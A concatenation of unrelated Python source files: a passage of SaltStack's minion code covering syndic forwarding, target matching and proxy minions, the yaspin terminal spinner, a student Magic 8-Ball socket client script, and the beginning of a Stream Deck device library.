        shuffle(masters)
        if master_id not in self._syndics:
            master_id = masters.pop(0)
        else:
            masters.remove(master_id)

        while True:
            yield master_id, self._syndics[master_id]
            if len(masters) == 0:
                break
            master_id = masters.pop(0)

    def _reset_event_aggregation(self):
        self.jids = {}
        self.raw_events = []

    # Syndic Tune In
    def tune_in(self):
        '''
        Lock onto the publisher. This is the main event loop for the syndic
        '''
        self._spawn_syndics()
        # Instantiate the local client
        self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
        self.local.event.subscribe('')

        log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))

        # register the event sub to the poller
        self._reset_event_aggregation()
        self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
        self.local_event_stream.on_recv(self._process_event)

        # forward events every syndic_event_forward_timeout
        self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
                                                              self.opts['syndic_event_forward_timeout'] * 1000,
                                                              io_loop=self.io_loop)
        self.forward_events.start()

        # Make sure to gracefully handle SIGUSR1
        enable_sigusr1_handler()

        self.io_loop.start()

    def _process_event(self, raw):
        # TODO: cleanup: Move down into event class
        raw = raw[0]
        mtag, data = self.local.event.unpack(raw, self.local.event.serial)
        event = {'data': data, 'tag': mtag}
        log.trace('Got event {0}'.format(event['tag']))
        tag_parts = event['tag'].split('/')
        if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
                salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
                'return' in event['data']:
            if 'jid' not in event['data']:
                # Not a job return
                return
            if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
                log.debug('Return received with matching master_id, not forwarding')
                return

            jdict = self.jids.setdefault(event['tag'], {})
            if not jdict:
                jdict['__fun__'] = event['data'].get('fun')
                jdict['__jid__'] = event['data']['jid']
                jdict['__load__'] = {}
                fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
                # Only need to forward each load once. Don't hit the disk
                # for every minion return!
                if event['data']['jid'] not in self.jid_forward_cache:
                    jdict['__load__'].update(
                        self.mminion.returners[fstr](event['data']['jid'])
                    )
                    self.jid_forward_cache.add(event['data']['jid'])
                    if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
                        # Pop the oldest jid from the cache
                        tmp = sorted(list(self.jid_forward_cache))
                        tmp.pop(0)
                        self.jid_forward_cache = set(tmp)
            if 'master_id' in event['data']:
                # __'s to make sure it doesn't print out on the master cli
                jdict['__master_id__'] = event['data']['master_id']
            jdict[event['data']['id']] = event['data']['return']
        else:
            # TODO: config to forward these? If so we'll have to keep track of who
            # has seen them
            # if we are the top level masters-- don't forward all the minion events
            if self.syndic_mode == 'sync':
                # Add generic event aggregation here
                if 'retcode' not in event['data']:
                    self.raw_events.append(event)

    def _forward_events(self):
        log.trace('Forwarding events')
        if self.raw_events:
            self._call_syndic('_fire_master',
                              kwargs={'events': self.raw_events,
                                      'pretag': tagify(self.opts['id'], base='syndic'),
                                      'timeout': self.SYNDIC_EVENT_TIMEOUT,
                                      },
                              )
        for jid, jid_ret in self.jids.items():
            self._call_syndic('_return_pub',
                              args=(jid_ret, '_syndic_return'),
                              kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
                              master_id=jid_ret.get('__master_id__'),
                              )
        self._reset_event_aggregation()


class Matcher(object):
    '''
    Use to return the value for matching calls from the master
    '''
    def __init__(self, opts, functions=None):
        self.opts = opts
        self.functions = functions

    def confirm_top(self, match, data, nodegroups=None):
        '''
        Takes the data passed to a top file environment and determines if the
        data matches this minion
        '''
        matcher = 'compound'
        if not data:
            log.error('Received bad data when setting the match from the top '
                      'file')
            return False
        for item in data:
            if isinstance(item, dict):
                if 'match' in item:
                    matcher = item['match']
        if hasattr(self, matcher + '_match'):
            funcname = '{0}_match'.format(matcher)
            if matcher == 'nodegroup':
                return getattr(self, funcname)(match, nodegroups)
            return getattr(self, funcname)(match)
        else:
            log.error('Attempting to match with unknown matcher: {0}'.format(
                matcher
            ))
            return False

    def glob_match(self, tgt):
        '''
        Returns true if the passed glob matches the id
        '''
        if not isinstance(tgt, six.string_types):
            return False

        return fnmatch.fnmatch(self.opts['id'], tgt)

    def pcre_match(self, tgt):
        '''
        Returns true if the passed pcre regex matches
        '''
        return bool(re.match(tgt, self.opts['id']))

    def list_match(self, tgt):
        '''
        Determines if this host is on the list
        '''
        if isinstance(tgt, six.string_types):
            tgt = tgt.split(',')
        return bool(self.opts['id'] in tgt)

    def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the grains glob match
        '''
        log.debug('grains target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['grains'], tgt, delimiter=delimiter
        )

    def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Matches a grain based on regex
        '''
        log.debug('grains pcre target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for grains pcre match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['grains'], tgt,
                                        delimiter=delimiter, regex_match=True)

    def data_match(self, tgt):
        '''
        Match based on the local data store on the minion
        '''
        if self.functions is None:
            utils = salt.loader.utils(self.opts)
            self.functions = salt.loader.minion_mods(self.opts, utils=utils)
        comps = tgt.split(':')
        if len(comps) < 2:
            return False
        val = self.functions['data.getval'](comps[0])
        if val is None:
            # The value is not defined
            return False
        if isinstance(val, list):
            # We are matching a single component to a single list member
            for member in val:
                if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
                    return True
            return False
        if isinstance(val, dict):
            if comps[1] in val:
                return True
            return False
        return bool(fnmatch.fnmatch(
            val,
            comps[1],
        ))

    def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar glob match
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter
        )

    def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
        '''
        Reads in the pillar pcre match
        '''
        log.debug('pillar PCRE target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar PCRE match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(
            self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
        )

    def pillar_exact_match(self, tgt, delimiter=':'):
        '''
        Reads in the pillar match, no globbing, no PCRE
        '''
        log.debug('pillar target: {0}'.format(tgt))
        if delimiter not in tgt:
            log.error('Got insufficient arguments for pillar match '
                      'statement from master')
            return False
        return salt.utils.subdict_match(self.opts['pillar'],
                                        tgt,
                                        delimiter=delimiter,
                                        exact_match=True)

    def ipcidr_match(self, tgt):
        '''
        Matches based on IP address or CIDR notation
        '''
        try:
            # Target is a network
            tgt = ipaddress.ip_network(tgt)
            proto = 'ipv{0}'.format(tgt.version)
            if proto not in self.opts['grains']:
                return False
            else:
                return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
        except:  # pylint: disable=bare-except
            try:
                # Target should be an address
                proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
                if proto not in self.opts['grains']:
                    return False
                else:
                    return tgt in self.opts['grains'][proto]
            except:  # pylint: disable=bare-except
                log.error('Invalid IP/CIDR target: {0}'.format(tgt))
                return False

    def range_match(self, tgt):
        '''
        Matches based on range cluster
        '''
        if HAS_RANGE:
            range_ = seco.range.Range(self.opts['range_server'])
            try:
                return self.opts['grains']['fqdn'] in range_.expand(tgt)
            except seco.range.RangeException as exc:
                log.debug('Range exception in compound match: {0}'.format(exc))
                return False
        return False

    def compound_match(self, tgt):
        '''
        Runs the compound target check
        '''
        if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
            log.error('Compound target received that is neither string, list nor tuple')
            return False
        log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
        ref = {'G': 'grain',
               'P': 'grain_pcre',
               'I': 'pillar',
               'J': 'pillar_pcre',
               'L': 'list',
               'N': None,      # Nodegroups should already be expanded
               'S': 'ipcidr',
               'E': 'pcre'}
        if HAS_RANGE:
            ref['R'] = 'range'

        results = []
        opers = ['and', 'or', 'not', '(', ')']

        if isinstance(tgt, six.string_types):
            words = tgt.split()
        else:
            words = tgt

        for word in words:
            target_info = salt.utils.minions.parse_target(word)

            # Easy check first
            if word in opers:
                if results:
                    if results[-1] == '(' and word in ('and', 'or'):
                        log.error('Invalid beginning operator after "(": {0}'.format(word))
                        return False
                    if word == 'not':
                        if not results[-1] in ('and', 'or', '('):
                            results.append('and')
                    results.append(word)
                else:
                    # seq start with binary oper, fail
                    if word not in ['(', 'not']:
                        log.error('Invalid beginning operator: {0}'.format(word))
                        return False
                    results.append(word)

            elif target_info and target_info['engine']:
                if 'N' == target_info['engine']:
                    # Nodegroups should already be expanded/resolved to other engines
                    log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
                    return False
                engine = ref.get(target_info['engine'])
                if not engine:
                    # If an unknown engine is called at any time, fail out
                    log.error('Unrecognized target engine "{0}" for'
                              ' target expression "{1}"'.format(
                                  target_info['engine'],
                                  word,
                              ))
                    return False

                engine_args = [target_info['pattern']]
                engine_kwargs = {}
                if target_info['delimiter']:
                    engine_kwargs['delimiter'] = target_info['delimiter']

                results.append(
                    str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
                )

            else:
                # The match is not explicitly defined, evaluate it as a glob
                results.append(str(self.glob_match(word)))

        results = ' '.join(results)
        log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
        try:
            return eval(results)  # pylint: disable=W0123
        except Exception:
            log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
            return False

    def nodegroup_match(self, tgt, nodegroups):
        '''
        This is a compatibility matcher and is NOT called when using
        nodegroups for remote execution, but is called when the nodegroups
        matcher is used in states
        '''
        if tgt in nodegroups:
            return self.compound_match(
                salt.utils.minions.nodegroup_comp(tgt, nodegroups)
            )
        return False


class ProxyMinion(Minion):
    '''
    This class instantiates a 'proxy' minion--a minion that does not manipulate
    the host it runs on, but instead manipulates a device that cannot run a minion.
    '''

    # TODO: better name...
    @tornado.gen.coroutine
    def _post_master_init(self, master):
        '''
        Function to finish init after connecting to a master

        This is primarily loading modules, pillars, etc. (since they need
        to know which master they connected to)
        '''
        log.debug("subclassed _post_master_init")
        self.opts['master'] = master

        self.opts['pillar'] = yield salt.pillar.get_async_pillar(
            self.opts,
            self.opts['grains'],
            self.opts['id'],
            self.opts['environment'],
            pillarenv=self.opts.get('pillarenv'),
        ).compile_pillar()

        if 'proxy' not in self.opts['pillar']:
            log.error('No proxy key found in pillar for id ' + self.opts['id'] + '.')
            log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
            self._running = False
            raise SaltSystemExit(code=-1)

        fq_proxyname = self.opts['pillar']['proxy']['proxytype']
        self.opts['proxy'] = self.opts['pillar']['proxy']

        # We need to do this again, because we are going to throw out a lot of grains.
        self.opts['grains'] = salt.loader.grains(self.opts)

        self.opts['proxymodule'] = salt.loader.proxy(self.opts, None, loaded_base_name=fq_proxyname)
        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()

        if ('{0}.init'.format(fq_proxyname) not in self.opts['proxymodule'] or
                '{0}.shutdown'.format(fq_proxyname) not in self.opts['proxymodule']):
            log.error('Proxymodule {0} is missing an init() or a shutdown() or both.'.format(fq_proxyname))
            log.error('Check your proxymodule. Salt-proxy aborted.')
            self._running = False
            raise SaltSystemExit(code=-1)

        proxy_fn = self.opts['proxymodule'].loaded_base_name + '.init'
        self.opts['proxymodule'][proxy_fn](self.opts)

        # reload ?!?
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        self.beacons = salt.beacons.Beacon(self.opts, self.functions)
        uid = salt.utils.get_uid(user=self.opts.get('user', None))
        self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)

        self.schedule = salt.utils.schedule.Schedule(
            self.opts,
            self.functions,
            self.returners)

        # add default scheduling jobs to the minions scheduler
        if 'mine.update' in self.functions:
            log.info('Added mine.update to scheduler')
            self.schedule.add_job({
                '__mine_interval':
                {
                    'function': 'mine.update',
                    'minutes': self.opts['mine_interval'],
                    'jid_include': True,
                    'maxrunning': 2
                }
            }, persist=True)

        # add master_alive job if enabled
        if self.opts['master_alive_interval'] > 0:
            self.schedule.add_job({
                '__master_alive':
                {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
            }, persist=True)

        self.grains_cache = self.opts['grains']
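
# --- Illustrative sketch (not part of minion.py) ---------------------------
# Minimal, self-contained demo of the evaluation strategy used by
# Matcher.compound_match above: each target word is resolved to the string
# 'True' or 'False', boolean operators are passed through unchanged, and the
# resulting expression is eval()'d. The compound_eval helper below is a
# hypothetical stand-in for the real Matcher; only glob matching is modeled.
import fnmatch

def compound_eval(expr, minion_id):
    opers = ('and', 'or', 'not', '(', ')')
    results = []
    for word in expr.split():
        if word in opers:
            results.append(word)
        else:
            # glob matching is the fallback engine, as in Matcher.glob_match
            results.append(str(fnmatch.fnmatch(minion_id, word)))
    # same eval() trick compound_match uses on its joined results string
    return eval(' '.join(results))

# 'web*' matches 'web01' and 'db*' does not, so the expression is True
print(compound_eval('web* or db*', 'web01'))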
core.py
# :copyright: (c) 2021 by Pavlo Dmytrenko. # :license: MIT, see LICENSE for more details. """ yaspin.yaspin ~~~~~~~~~~~~~ A lightweight terminal spinner. """ import contextlib import datetime import functools import itertools import signal import sys import threading import time from typing import List, Set, Union from termcolor import colored from .base_spinner import Spinner, default_spinner from .constants import COLOR_ATTRS, COLOR_MAP, SPINNER_ATTRS from .helpers import to_unicode class Yaspin: # pylint: disable=useless-object-inheritance,too-many-instance-attributes """Implements a context manager that spawns a thread to write spinner frames into a tty (stdout) during context execution. """ # When Python finds its output attached to a terminal, # it sets the sys.stdout.encoding attribute to the terminal's encoding. # The print statement's handler will automatically encode unicode # arguments into bytes. def __init__( # pylint: disable=too-many-arguments self, spinner=None, text="", color=None, on_color=None, attrs=None, reversal=False, side="left", sigmap=None, timer=False, ): # Spinner self._spinner = self._set_spinner(spinner) self._frames = self._set_frames(self._spinner, reversal) self._interval = self._set_interval(self._spinner) self._cycle = self._set_cycle(self._frames) # Color Specification self._color = self._set_color(color) if color else color self._on_color = self._set_on_color(on_color) if on_color else on_color self._attrs = self._set_attrs(attrs) if attrs else set() self._color_func = self._compose_color_func() # Other self._text = text self._side = self._set_side(side) self._reversal = reversal self._timer = timer self._start_time = None self._stop_time = None # Helper flags self._stop_spin = None self._hide_spin = None self._spin_thread = None self._last_frame = None self._stdout_lock = threading.Lock() self._hidden_level = 0 # Signals # In Python 2 signal.SIG* are of type int. # In Python 3 signal.SIG* are enums. # # Signal = Union[enum.Enum, int] # SigHandler = Union[enum.Enum, Callable] self._sigmap = sigmap if sigmap else {} # Dict[Signal, SigHandler] # Maps signals to their default handlers in order to reset # custom handlers set by ``sigmap`` at the cleanup phase. self._dfl_sigmap = {} # Dict[Signal, SigHandler] # # Dunders # def __repr__(self): return "<Yaspin frames={0!s}>".format(self._frames) def __enter__(self): self.start() return self def __exit__(self, exc_type, exc_val, traceback): # Avoid stop() execution for the 2nd time if self._spin_thread.is_alive(): self.stop() return False # nothing is handled def __call__(self, fn): @functools.wraps(fn) def inner(*args, **kwargs): with self: return fn(*args, **kwargs) return inner def __getattr__(self, name): # CLI spinners if name in SPINNER_ATTRS: from .spinners import Spinners # pylint: disable=import-outside-toplevel sp = getattr(Spinners, name) self.spinner = sp # Color Attributes: "color", "on_color", "attrs" elif name in COLOR_ATTRS: attr_type = COLOR_MAP[name] # Call appropriate property setters; # _color_func is updated automatically by setters. 
if attr_type == "attrs": self.attrs = [name] # calls property setter if attr_type in ("color", "on_color"): setattr(self, attr_type, name) # calls property setter # Side: "left" or "right" elif name in ("left", "right"): self.side = name # calls property setter # Common error for unsupported attributes else: raise AttributeError( "'{0}' object has no attribute: '{1}'".format( self.__class__.__name__, name ) ) return self # # Properties # @property def spinner(self): return self._spinner @spinner.setter def spinner(self, sp): self._spinner = self._set_spinner(sp) self._frames = self._set_frames(self._spinner, self._reversal) self._interval = self._set_interval(self._spinner) self._cycle = self._set_cycle(self._frames) @property def text(self): return self._text @text.setter def text(self, txt): self._text = txt @property def color(self): return self._color @color.setter def color(self, value): self._color = self._set_color(value) if value else value self._color_func = self._compose_color_func() # update @property def on_color(self): return self._on_color @on_color.setter def on_color(self, value): self._on_color = self._set_on_color(value) if value else value self._color_func = self._compose_color_func() # update @property def attrs(self): return list(self._attrs) @attrs.setter def attrs(self, value): new_attrs = self._set_attrs(value) if value else set() self._attrs = self._attrs.union(new_attrs) self._color_func = self._compose_color_func() # update @property def side(self): return self._side @side.setter def side(self, value): self._side = self._set_side(value) @property def reversal(self): return self._reversal @reversal.setter def reversal(self, value): self._reversal = value self._frames = self._set_frames(self._spinner, self._reversal) self._cycle = self._set_cycle(self._frames) @property def elapsed_time(self): if self._start_time is None: return 0 if self._stop_time is None: return time.time() - self._start_time return self._stop_time - self._start_time # # Public # def start(self): if self._sigmap: self._register_signal_handlers() if sys.stdout.isatty(): self._hide_cursor() self._start_time = time.time() self._stop_time = None # Reset value to properly calculate subsequent spinner starts (if any) # pylint: disable=line-too-long self._stop_spin = threading.Event() self._hide_spin = threading.Event() self._spin_thread = threading.Thread(target=self._spin) self._spin_thread.start() def stop(self): self._stop_time = time.time() if self._dfl_sigmap: # Reset registered signal handlers to default ones self._reset_signal_handlers() if self._spin_thread: self._stop_spin.set() self._spin_thread.join() sys.stdout.write("\r") self._clear_line() if sys.stdout.isatty(): self._show_cursor() def hide(self): """Hide the spinner to allow for custom writing to the terminal.""" thr_is_alive = self._spin_thread and self._spin_thread.is_alive() if thr_is_alive and not self._hide_spin.is_set(): with self._stdout_lock: # set the hidden spinner flag self._hide_spin.set() # clear the current line sys.stdout.write("\r") self._clear_line() # flush the stdout buffer so the current line # can be rewritten to sys.stdout.flush() @contextlib.contextmanager def hidden(self): """Hide the spinner within a block, can be nested""" if self._hidden_level == 0: self.hide() self._hidden_level += 1 try: yield finally: self._hidden_level -= 1 if self._hidden_level == 0: self.show() def show(self): """Show the hidden spinner.""" thr_is_alive = self._spin_thread and self._spin_thread.is_alive() if thr_is_alive and 
self._hide_spin.is_set(): with self._stdout_lock: # clear the hidden spinner flag self._hide_spin.clear() # clear the current line so the spinner is not appended to it sys.stdout.write("\r") self._clear_line() def write(self, text): """Write text in the terminal without breaking the spinner.""" # similar to tqdm.write() # https://pypi.python.org/pypi/tqdm#writing-messages with self._stdout_lock: sys.stdout.write("\r") self._clear_line() if isinstance(text, (str, bytes)): _text = to_unicode(text) else: _text = str(text) # Ensure output is Unicode assert isinstance(_text, str) sys.stdout.write("{0}\n".format(_text)) def ok(self, text="OK"): """Set Ok (success) finalizer to a spinner.""" _text = text if text else "OK" self._freeze(_text) def fail(self, text="FAIL"): """Set fail finalizer to a spinner.""" _text = text if text else "FAIL" self._freeze(_text) # # Protected # def _freeze(self, final_text): """Stop spinner, compose last frame and 'freeze' it.""" text = to_unicode(final_text) self._last_frame = self._compose_out(text, mode="last") # Should be stopped here, otherwise prints after # self._freeze call will mess up the spinner self.stop() with self._stdout_lock: sys.stdout.write(self._last_frame) def _spin(self): while not self._stop_spin.is_set(): if self._hide_spin.is_set(): # Wait a bit to avoid wasting cycles time.sleep(self._interval) continue # Compose output spin_phase = next(self._cycle) out = self._compose_out(spin_phase) # Write with self._stdout_lock: sys.stdout.write(out) self._clear_line() sys.stdout.flush() # Wait self._stop_spin.wait(self._interval) def _compose_color_func(self): return functools.partial( colored, color=self._color, on_color=self._on_color, attrs=list(self._attrs), ) def _compose_out(self, frame, mode=None): # Ensure Unicode input assert isinstance(frame, str) assert isinstance(self._text, str) text = self._text # Colors if self._color_func is not None: frame = self._color_func(frame) # Position if self._side == "right": frame, text = text, frame if self._timer: sec, fsec = divmod(round(100 * self.elapsed_time), 100) text += " ({}.{:02.0f})".format(datetime.timedelta(seconds=sec), fsec) # Mode if not mode: out = "\r{0} {1}".format(frame, text) else: out = "{0} {1}\n".format(frame, text) # Ensure output is Unicode assert isinstance(out, str) return out def _register_signal_handlers(self): # SIGKILL cannot be caught or ignored, and the receiving # process cannot perform any clean-up upon receiving this # signal. if signal.SIGKILL in self._sigmap.keys(): raise ValueError( "Trying to set handler for SIGKILL signal. " "SIGKILL cannot be cought or ignored in POSIX systems." ) for sig, sig_handler in self._sigmap.items(): # A handler for a particular signal, once set, remains # installed until it is explicitly reset. Store default # signal handlers for subsequent reset at cleanup phase. dfl_handler = signal.getsignal(sig) self._dfl_sigmap[sig] = dfl_handler # ``signal.SIG_DFL`` and ``signal.SIG_IGN`` are also valid # signal handlers and are not callables. if callable(sig_handler): # ``signal.signal`` accepts handler function which is # called with two arguments: signal number and the # interrupted stack frame. ``functools.partial`` solves # the problem of passing spinner instance into the handler # function. 
sig_handler = functools.partial(sig_handler, spinner=self)

            signal.signal(sig, sig_handler)

    def _reset_signal_handlers(self):
        for sig, sig_handler in self._dfl_sigmap.items():
            signal.signal(sig, sig_handler)

    #
    # Static
    #
    @staticmethod
    def _set_color(value: str) -> str:
        available_values = [k for k, v in COLOR_MAP.items() if v == "color"]
        if value not in available_values:
            raise ValueError(
                "'{0}': unsupported color value. Use one of the: {1}".format(
                    value, ", ".join(available_values)
                )
            )
        return value

    @staticmethod
    def _set_on_color(value: str) -> str:
        available_values = [k for k, v in COLOR_MAP.items() if v == "on_color"]
        if value not in available_values:
            raise ValueError(
                "'{0}': unsupported on_color value. "
                "Use one of the: {1}".format(value, ", ".join(available_values))
            )
        return value

    @staticmethod
    def _set_attrs(attrs: List[str]) -> Set[str]:
        available_values = [k for k, v in COLOR_MAP.items() if v == "attrs"]
        for attr in attrs:
            if attr not in available_values:
                raise ValueError(
                    "'{0}': unsupported attribute value. "
                    "Use one of the: {1}".format(attr, ", ".join(available_values))
                )
        return set(attrs)

    @staticmethod
    def _set_spinner(spinner):
        if hasattr(spinner, "frames") and hasattr(spinner, "interval"):
            if not spinner.frames or not spinner.interval:
                sp = default_spinner
            else:
                sp = spinner
        else:
            sp = default_spinner

        return sp

    @staticmethod
    def _set_side(side: str) -> str:
        if side not in ("left", "right"):
            # include the offending value in the message
            # (the original string had placeholders but never formatted them)
            raise ValueError(
                "'{0}': unsupported side value. "
                "Use either 'left' or 'right'.".format(side)
            )
        return side

    @staticmethod
    def _set_frames(spinner: Spinner, reversal: bool) -> Union[str, List]:
        uframes = None  # unicode frames
        uframes_seq = None  # sequence of unicode frames

        if isinstance(spinner.frames, str):
            uframes = spinner.frames

        # TODO (pavdmyt): support any type that implements iterable
        if isinstance(spinner.frames, (list, tuple)):
            # Empty ``spinner.frames`` is handled by ``Yaspin._set_spinner``
            if spinner.frames and isinstance(spinner.frames[0], bytes):
                uframes_seq = [to_unicode(frame) for frame in spinner.frames]
            else:
                uframes_seq = spinner.frames

        _frames = uframes or uframes_seq
        if not _frames:
            # Empty ``spinner.frames`` is handled by ``Yaspin._set_spinner``.
            # This code is very unlikely to be executed. However, it's still
            # here to be on a safe side.
            raise ValueError("{0!r}: no frames found in spinner".format(spinner))

        # Builtin ``reversed`` returns reverse iterator,
        # which adds unnecessary difficulty for returning
        # unicode value;
        # Hence using [::-1] syntax
        frames = _frames[::-1] if reversal else _frames

        return frames

    @staticmethod
    def _set_interval(spinner):
        # Milliseconds to Seconds
        return spinner.interval * 0.001

    @staticmethod
    def _set_cycle(frames):
        return itertools.cycle(frames)

    @staticmethod
    def _hide_cursor():
        sys.stdout.write("\033[?25l")
        sys.stdout.flush()

    @staticmethod
    def _show_cursor():
        sys.stdout.write("\033[?25h")
        sys.stdout.flush()

    @staticmethod
    def _clear_line():
        sys.stdout.write("\033[K")
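
# --- Illustrative usage sketch (not part of the original module) ---
# The helper below assumes this class is the ``Yaspin`` spinner referenced in
# the comments above, and that its constructor (defined earlier in the file)
# accepts ``text`` and ``color`` keyword arguments; both are assumptions. It
# is never called by the module and only shows how start/write/hidden and the
# ok() finalizer compose.
def _demo_yaspin_usage():
    import time as _time

    sp = Yaspin(text="Downloading...", color="cyan")
    sp.start()                    # spawns the background _spin thread
    _time.sleep(0.5)
    sp.write("> file 1 fetched")  # prints a line without breaking the frame
    with sp.hidden():             # temporarily clears the spinner line
        print("raw terminal output")
    sp.ok("OK")                   # freezes a success frame and stops the thread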
cli.py
""" Project: python_assessment_3 Author: Diego C. <20026893@tafe.wa.edu.au> Created at: 10/11/2020 9:52 pm File: cli.py """ import sys import threading import time import task_b.server.server as server import task_b.client.client as client HOST = '127.0.0.1' PORT = 5555 def get_user_input(): """Gets user input.""" inp = input('Your question: ') while not inp.strip(): print('Invalid input, please try again\n') inp = input('Your question: ') return inp def print_header(): """Presents initial information about this program and captures user input. :return: Question asked by user """ print('\nWelcome! Ask the Magic 8-Ball a question below:') print('Enter "q" to quit the application\n') q = get_user_input() print() return q def start(): """Entry point of this program. Two threads are created whenever a question is asked - one for the server and another one for the client. This prevents blocking the main thread of the program with sockets and simulates real client-server handshakes. """ q = print_header() while q.strip().lower() != 'q': server_thread = threading.Thread(name='Server thread', target=server.listen, args=(HOST, PORT)) server_thread.start() print(f'{server_thread.name} started...waiting for connections...') client_thread = threading.Thread(name='Client thread', target=client.request, args=(q, HOST, PORT)) print(f'{client_thread.name} starting...sending request with question...\n') time.sleep(1) client_thread.start() client_thread.join() sys.stdout.flush() sys.stdin.flush() q = print_header() print('Bye!\n')
StreamDeck.py
# Python Stream Deck Library # Released under the MIT license # # dean [at] fourwalledcubicle [dot] com # www.fourwalledcubicle.com # import threading import time from abc import ABC, abstractmethod from ..Transport.Transport import TransportError class StreamDeck(ABC): """ Represents a physically attached original StreamDeck device. """ KEY_COUNT = None KEY_COLS = None KEY_ROWS = None KEY_PIXEL_WIDTH = None KEY_PIXEL_HEIGHT = None KEY_IMAGE_CODEC = None KEY_FLIP = None KEY_ROTATION = None DECK_TYPE = None def __init__(self, device): self.device = device self.last_key_states = [False] * self.KEY_COUNT self.read_thread = None self.run_read_thread = False self.key_callback = None self.update_lock = threading.RLock() def __del__(self): """ Delete handler for the StreamDeck, automatically closing the transport if it is currently open and terminating the transport reader thread. """ try: self._setup_reader(None) except (TransportError, ValueError): pass try: self.device.close() except (TransportError): pass def __enter__(self): """ Enter handler for the StreamDeck, taking the exclusive update lock on the deck. This can be used in a `with` statement to ensure that only one thread is currently updating the deck, even if it is doing multiple operations (e.g. setting the image on multiple keys). """ self.update_lock.acquire() def __exit__(self, type, value, traceback): """ Exit handler for the StreamDeck, releasing the exclusive update lock on the deck. """ self.update_lock.release() @abstractmethod def _read_key_states(self): """ Reads the raw key states from an attached StreamDeck. :rtype: list(bool) :return: List containing the raw key states. """ pass @abstractmethod def _reset_key_stream(self): """ Sends a blank key report to the StreamDeck, resetting the key image streamer in the device. This prevents previously started partial key writes that were not completed from corrupting images sent from this application. """ pass def _extract_string(self, data): """ Extracts out a human-readable string from a collection of raw bytes, removing any trailing whitespace or NUL bytes. """ return str(bytes(data), 'utf-8').rstrip(' \0') def _read(self): """ Read handler for the underlying transport, listening for button state changes on the underlying device, caching the new states and firing off any registered callbacks. """ while self.run_read_thread: try: new_key_states = self._read_key_states() if new_key_states is None: time.sleep(.05) continue if self.key_callback is not None: for k, (old, new) in enumerate(zip(self.last_key_states, new_key_states)): if old != new: self.key_callback(self, k, new) self.last_key_states = new_key_states except (TransportError): self.run_read_thread = False def _setup_reader(self, callback): """ Sets up the internal transport reader thread with the given callback, for asynchronous processing of HID events from the device. If the thread already exists, it is terminated and restarted with the new callback function. :param function callback: Callback to run on the reader thread. """ if self.read_thread is not None: self.run_read_thread = False self.read_thread.join() if callback is not None: self.run_read_thread = True self.read_thread = threading.Thread(target=callback) self.read_thread.daemon = True self.read_thread.start() def open(self): """ Opens the device for input/output. This must be called prior to setting or retrieving any device state. .. seealso:: See :func:`~StreamDeck.close` for the corresponding close method. 
""" self.device.open() self._reset_key_stream() self._setup_reader(self._read) def close(self): """ Closes the device for input/output. .. seealso:: See :func:`~StreamDeck.open` for the corresponding open method. """ self.device.close() def connected(self): """ Indicates if the physical StreamDeck device this instance is attached to is still connected to the host. :rtype: bool :return: `True` if the deck is still connected, `False` otherwise. """ return self.device.connected() def id(self): """ Retrieves the physical ID of the attached StreamDeck. This can be used to differentiate one StreamDeck from another. :rtype: str :return: Identifier for the attached device. """ return self.device.path() def key_count(self): """ Retrieves number of physical buttons on the attached StreamDeck device. :rtype: int :return: Number of physical buttons. """ return self.KEY_COUNT def deck_type(self): """ Retrieves the model of Stream Deck. :rtype: str :return: Text corresponding to the specific type of the device. """ return self.DECK_TYPE def key_layout(self): """ Retrieves the physical button layout on the attached StreamDeck device. :rtype: (int, int) :return (rows, columns): Number of button rows and columns. """ return self.KEY_ROWS, self.KEY_COLS def key_image_format(self): """ Retrieves the image format accepted by the attached StreamDeck device. Images should be given in this format when setting an image on a button. .. seealso:: See :func:`~StreamDeck.set_key_image` method to update the image displayed on a StreamDeck button. :rtype: dict() :return: Dictionary describing the various image parameters (size, image format, image mirroring and rotation). """ return { 'size': (self.KEY_PIXEL_WIDTH, self.KEY_PIXEL_HEIGHT), 'format': self.KEY_IMAGE_FORMAT, 'flip': self.KEY_FLIP, 'rotation': 